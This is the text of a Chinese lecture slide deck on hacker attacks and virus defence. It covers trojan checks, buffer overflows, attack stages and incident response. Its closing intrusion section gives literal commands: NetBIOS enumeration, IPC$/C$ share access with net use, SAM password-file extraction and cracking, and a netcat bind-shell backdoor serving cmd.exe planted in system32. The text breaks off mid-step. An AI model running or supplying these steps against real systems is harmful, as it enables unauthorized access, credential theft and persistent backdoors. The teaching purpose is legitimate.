火龙果黑客与病毒防范技术分析报告.pptVIP

另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的“系统文件检查器”，通过“开始菜单”-“程序”-“附件”-“系统工具”-“系统信息”-“工具”可以运行“系统文件检查器”, 用“系统文件检查器”可检测操作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件（如驱动程序）。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马(或者损坏了),提取改动过的文件可以保证你的系统安全和稳定。 缓冲区是内存中存放数据的地方。 在程序试图将数据放到计算机内存中的某一位置，但没有足够空间时会发生缓冲区溢出。 缓冲区溢出是一种系统攻击手段，通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其他指令，以达到攻击的目的。 程序员可以通过谨慎的编程技巧消除缓冲区溢出问题。 五、缓冲区溢出及其攻击 第五节 黑客攻击的一般步骤及防范措施 入侵级别 1级：邮件炸弹、简单服务拒绝 2级：本地用户获得非授权读访问 3级、本地用户获得非授权写权限、远程用户获得非授权的帐号 4级：远程用户获得特权文件的读权限 5级：远程用户获得了特权文件的写权限 6级：远程用户拥有了根（root）权限（黑客已攻克系统）。 黑客攻击系统的步骤 1、收集目标计算机的信息 2、寻找目标计算机的漏洞和选择合适的入侵方法 3、留下“后门” 4、清除入侵记录 黑客攻击一般过程 端口扫描 http ftp telnet smtp 黑客攻击一般过程 口令暴力攻击 用户名:john 口令:john1234 黑客攻击一般过程 用john登录 服务器 利用漏洞获得 超级用户权限 留后门 隐藏用户 更改主页信息 典型的网络攻击示意图 选中攻击目标 获取普通 用户权限 擦除入 侵痕迹 安装后门新建帐号 获取超级 用户权限 攻击其它 主机 获取或 修改信息 从事其它 非法活动 扫描 网络 利用系统已知的漏洞、通过输入区向CGI发送特殊的命令、发送特别大的数据造成缓冲区溢出、猜测已知用户的口令，从而发现突破口。 对付黑客入侵的措施 进行评估： 入侵者只获得访问权（一个登录名和口令） 入侵者获得访问权，并毁坏、侵蚀或改变数据 入侵者获得访问权，并捕获系统一部分或整个系统控制权，拒绝拥有特权的用户的访问 入侵者没有获得访问权，而是用不良的程序，引起网络持久性或暂时性的运行失败、重新启动、挂起或其他无法操作的状态。 根据以上不同程度采取相应措施防范 1、了解黑客入侵后的特征 有时突然死机，然后又重新启动。 在无任何操作时，却拼命读写硬盘;无故对软驱进行搜索。 没有运行大程序，而系统的速度越来越慢。 用Netstat命令查看计算机网络状况，发现有非法端口打开，并有人连接用户。 关闭所有的上网软件，却发现用户网络连接灯仍然闪烁。 Win2000/NT中，新增了额外的管理员帐号和用户。 2、对付黑客的应急方法 估计形势 　是否已成功入侵？是否还在系统中？是否来自内部？是否知道入侵者身分？ 切断连接 　能否关闭服务器？是否要追踪黑客？是否能承受关闭造成的损失？ 分析问题 　查出入侵原因。 采取行动 　修复安全漏洞并恢复系统。 第六节 入侵实例 通过NetBIOS入侵 　　139端口是NetBIOS　Session端口，用来进行文件和打印共享，是NT潜在的危险。 1、用NBTSTAT命令，用来查询NetBIOS信息。 　Cnbtstat –A x.x.x.x 2、用net use建立连接 　c:net use \\x.x.x.x\ipc$ “密码”　/user:”用户名” 　c:net view \\x.x.x.x 　c:net use x: \\x.x.x.x\c$ 　c:dir x: /p 注意：通过IPC$连接会在Eventlog中留下记录。 口令破解（sam文件） C:copy x:\winnt\repair\sam._ C:expand sam._ sam C:samdump sam samfile 用10phtcrack或NTCrack 留下后门 　利用netcat工具 　　　先做一个批处理文件，如：runnc.bat,内容为: nc –L –d –p [port] –t –e cmd.exe 然后将netcat软件和runnc.bat文件拷贝到目标计算机的c:\winnt\system32目录中。一旦该批处理文件启动，入侵者就可通过Telnet进行连接，从而执行cmd.exe命令做你想做的任何事情。 远程入侵Win2000 利用输入法漏洞 　对于提供远程终端服务（端口为3389）的win2000服务器，如果存在输入法漏洞，即可实现入侵。方法如下： 1、